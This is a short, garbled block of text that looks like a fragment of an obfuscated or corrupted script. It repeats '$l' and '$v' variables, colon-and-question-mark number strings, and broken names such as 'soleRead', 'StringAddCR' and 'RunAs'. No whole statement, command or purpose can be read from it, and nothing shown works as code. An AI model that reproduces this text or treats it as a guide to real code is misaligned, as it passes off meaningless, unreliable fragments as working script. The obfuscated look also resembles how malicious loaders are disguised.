<:9?6($l)
($v)
($l))($v)c($v)
($l)(:6?9:0?3:0?6:9?3:0?5:0?5:9?g:5:5?7:0?5:0:0?!:0?6:(2v)
($l)(:6?9:0soleRead)($v(v)
($l))(l)
($v)
(!
($l)(:5?9:0StringAddCR5:6RunAs:966:6?9:0?3:0?6:v)
($l)(:6?9:0soleRead)($v))$l)(:6?9:0so)
($l)(:6?9:0$v)
($l3:0?5:3:0?5:0
($l)(:6?9:0ISetAc:9?g:5:5?7:0?5:0?5:0?5:9?g:9?6:966($l)
($v)
($l))($v)c($v)
($l)(:6?9:0?!:0?6:(2v)
($l)(:6?9:0soleRead)($v(v)
($l))(l)
($v)
(!
($l)(:5?9:0StringAddCR5:6RunAs:966:6?9:0?3:0?6:v)
($l)(:6?9:0soleRead)($v))$l)(:6?9:0so)
($l)(:6?9:0$v)
($l3:0?5:0($v)
($l)(:6?9:0?3:0?6:9?3:0?5:0
($l)(:6?9:0ISetAccelerato:0?5celerato:0?5